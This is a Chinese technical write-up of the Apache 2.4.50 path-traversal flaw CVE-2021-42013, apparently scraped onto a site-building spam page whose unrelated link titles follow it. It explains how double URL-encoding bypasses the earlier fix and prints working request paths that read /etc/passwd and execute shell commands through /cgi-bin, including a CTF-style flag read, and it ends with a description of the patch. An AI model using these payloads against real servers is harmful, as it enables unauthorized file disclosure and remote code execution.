当前位置: 首页 > news >正文

网站静态页模板桂林网站建站

网站静态页模板,桂林网站建站,四川省建设厅电子政务网站,网站开发制作价格CVE-2021-42013 漏洞版本#xff1a;Apache 2.4.50 Apache版本2.4.50是对CVE-2021-#xff08;版本2.4.49#xff09;的修复#xff0c;但是修复不完整导致可以绕过#xff0c;从而产生了CVE-2021-42013#xff08;版本2.4.50#xff09;。 这时修复了对.%2e的检测。…CVE-2021-42013 漏洞版本Apache 2.4.50 Apache版本2.4.50是对CVE-2021-版本2.4.49的修复但是修复不完整导致可以绕过从而产生了CVE-2021-42013版本2.4.50。 这时修复了对.%2e的检测。 在处理外部HTTP请求时会调用 ap_process_request_internal函数对url路径进行处理在该函数中首先会调用ap_normalize_path函数进行一次url解码之后会调用ap_unescape_url函数进行二次解码。 这时候我们只需要将…/url编码两次就行了。 ap_normalize_path函数调用栈如下在处理前path参数为/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd 经过ap_normalize_path函数处理后path参数变成/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd 经过unescape_url函数处理后可以看到此时的url字符串内容变成/icons/../../../../etc/passwd 补充一下 对于没有进⾏安全配置的Apache服务器默认情况可以⽤xxx.com/icons/的⽅式打开Apache⽬录下的icons⽂件夹并且会罗列出⽂件列表。一、可以路径穿越读取文件 读取文件 URL/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd在服务端开启了cgi或cgid这两个mod的情况下xxx.com/cgi-bin/xxx/bin/sh这个路径穿越漏洞将可以执行任意命令。POST方式直接提交命令前面要加一个echo;。二、可以命令执行 执行命令 URL/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/shPOST:echo;nl /ffffllllaaagggg_cc084c485d对两个CVE的修复 2.4.51版本针对该漏洞进行了多处修改最核心的一处修改是在ap_normalize_path函数中加强了对url编码的校验如果检测到存在非标准url编码不是%两个十六进制字符的情况就返回编码错误从根本上杜绝了多重编码可能导致的绕过。
http://www.zqtcl.cn/news/518931/

相关文章:

  • php彩票网站建设源码有人看片吗免费观看
  • 自己做网站的准备工作营销平台推广
  • 建站网站平台建站工具的优点
  • 各学院二级网站建设通报wordpress 修改admin
  • 网站建设加推广需要多少钱wordpress标签自动生成插件下载
  • 周村区建设局网站石家庄网站运营公司
  • 网站描述怎么设置wordpress仿模板
  • 宁波市网站建设公司h5游戏是什么意思
  • 青岛网站设计案例全栈网站开发
  • 欢迎访问中国建设银行网站个人客户网站建设需要经历什么步骤
  • 建设银行怀柔支行营业部网站企业官网手机版
  • cms那个做网站最好大连网站开发平台
  • 佛山建设外贸网站公司可信网站图标
  • 沈阳.....网站设计连云港优化网站团队
  • 网站添加白名单想学ui设计从哪里入手
  • 做期货与做网站的关系淮安市城市建设档案馆网站
  • 网站建设的技术亮点单位宣传册设计样本
  • 网站建设与维护服务敦化市建设局网站
  • 官方网站建设思路wordpress改成织梦
  • 网站建设推广方法网站调优
  • 苏州做企业网站wordpress前台发布文章
  • 怎么建个私人网站网络营销就业前景和薪水
  • 专业的网站开发团队京东电商平台
  • 做网站手机微信小程序怎么加入我的小程序
  • 做网站困难吗公司如何注册网站
  • 可信网站认证收费吗建设化工网站的目的
  • 查网站死链必用工具微信 wordpress
  • 做网站凡科新手如何开微商城店
  • 网站空间维护个人怎么注册一个品牌
  • 连云港网站设计城乡建设网站 资料员